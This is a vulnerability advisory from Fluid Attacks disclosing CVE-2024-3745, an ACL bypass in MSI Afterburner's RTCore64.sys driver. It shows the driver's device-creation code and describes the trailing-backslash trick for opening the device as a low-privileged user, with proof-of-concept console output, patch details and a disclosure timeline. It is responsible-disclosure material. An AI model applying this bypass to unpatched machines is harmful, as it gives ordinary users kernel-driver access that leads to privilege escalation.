MSI Afterburner v4.6.6.16381 Beta 3 - ACL Bypass

Summary

NameMSI Afterburner v4.6.6.16381 Beta 3 - ACL Bypass
Code nameGershwin
ProductMSI Afterburner
VendorMicro-Star INT'L CO.
Affected versionsVersion 4.6.6.16381 Beta 3
StatePublic
Release date2024-05-17

Vulnerability

KindACL Bypass
Rule115. Security controls bypass or absence
RemoteNo
CVSSv3 VectorCVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
CVSSv3 Base Score7.8
Exploit availableYes
CVE ID(s)CVE-2024-3745

Description

MSI Afterburner v4.6.6.16381 Beta 3 is vulnerable to an ACL Bypass vulnerability in the RTCore64.sys driver, which leads to triggering vulnerabilities like CVE-2024-1443 and CVE-2024-1460 from a low privileged user.

Vulnerability

The RTCore64.sys driver allows to perform any IOCTL operation from a low privileged user.

The creation of the DeviceObject is done using the following code:

RtlInitUnicodeString(&DefaultSDDLString, L"D:P(A;;GA;;;SY)(A;;GA;;;BA)");
  result = WdmlibIoCreateDeviceSecure(
             DriverObject,
             0,
             &DestinationString,
             0x22u,
             0,
             0,
             &DefaultSDDLString,
             0i64,
             &DeviceObject);

According to MSDN, the function signature is:

NTSTATUS WdmlibIoCreateDeviceSecure(
  [in]           PDRIVER_OBJECT   DriverObject,
  [in]           ULONG            DeviceExtensionSize,
  [in, optional] PUNICODE_STRING  DeviceName,
  [in]           DEVICE_TYPE      DeviceType,
  [in]           ULONG            DeviceCharacteristics,
  [in]           BOOLEAN          Exclusive,
  [in]           PCUNICODE_STRING DefaultSDDLString,
  [in, optional] LPCGUID          DeviceClassGuid,
                 PDEVICE_OBJECT   *DeviceObject
);

The defined SDDL string limits the access for the DeviceObject to Administrators only:

PS C:\Users\aroldan> ConvertFrom-SddlString "D:P(A;;GA;;;SY)(A;;GA;;;BA)" | select -ExpandProperty DiscretionaryAcl NT AUTHORITY\SYSTEM: AccessAllowed (GenericAll) BUILTIN\Administrators: AccessAllowed (GenericAll) PS C:\Users\aroldan>

Every DeviceObject has an associated name space, which means that paths like \Device\DeviceName and \Device\DeviceName\Anything would be valid targets for a IOCTL request. However, as the DeviceCharacteristics option is set to NULL when creating the DeviceObject, the defined ACL does not propagate to every possible file under the DeviceObject namespace, making it trivial to bypass the ACL by simply adding a \ in the end of the DeviceName definition in the IOCTL request:

PS C:\Users\admin\Desktop> whoami desktop-fm7vnok\admin PS C:\Users\admin\Desktop> whoami /priv PRIVILEGES INFORMATION ---------------------- Privilege Name Description State ============================= ==================================== ======== SeShutdownPrivilege Shut down the system Disabled SeChangeNotifyPrivilege Bypass traverse checking Enabled SeUndockPrivilege Remove computer from docking station Disabled SeIncreaseWorkingSetPrivilege Increase a process working set Disabled SeTimeZonePrivilege Change the time zone Disabled PS C:\Users\admin\Desktop> .\PoC.exe \\.\RTCore64 [!] Error while creating a handle to the driver: (0) Access is denied. PS C:\Users\admin\Desktop> .\PoC.exe \\.\RTCore64\
[+] Driver opened. DACL bypassed. Driver handle value: 0x8c.

Our security policy

We have reserved the ID CVE-2024-3745 to refer to this issue from now on.

System Information

  • Version: MSI Afterburner v4.6.6.16381 Beta 3
  • Operating System: Windows

Mitigation

The vendor published a the version 4.6.6 Beta 4 Build 16449 fixing this vulnerability:

Credits

The vulnerability was discovered by Andres Roldan from Fluid Attacks' Offensive Team.

References

Vendor page https://us.msi.com/

Product page https://www.msi.com/Landing/afterburner/graphics-cards

Patched version https://forums.guru3d.com/threads/msi-ab-rtss-development-news-thread.412822/page-227#post-6231456

Timeline

Time-lapse-logo

2024-04-11

Vulnerability discovered.

Time-lapse-logo

2024-04-11

Vendor contacted.

Time-lapse-logo

2024-04-13

Vendor replied acknowledging the report.

Time-lapse-logo

2024-04-13

Vendor Confirmed the vulnerability.

Time-lapse-logo

2024-05-17

Vulnerability patched.

Time-lapse-logo

2024-05-17

Public Disclosure.

Fluid Logo Footer

Hacking software for over 20 years

Fluid Attacks tests applications and other systems, covering all software development stages. Our team assists clients in quickly identifying and managing vulnerabilities to reduce the risk of incidents and deploy secure technology.

Copyright © 0 Fluid Attacks. We hack your software. All rights reserved.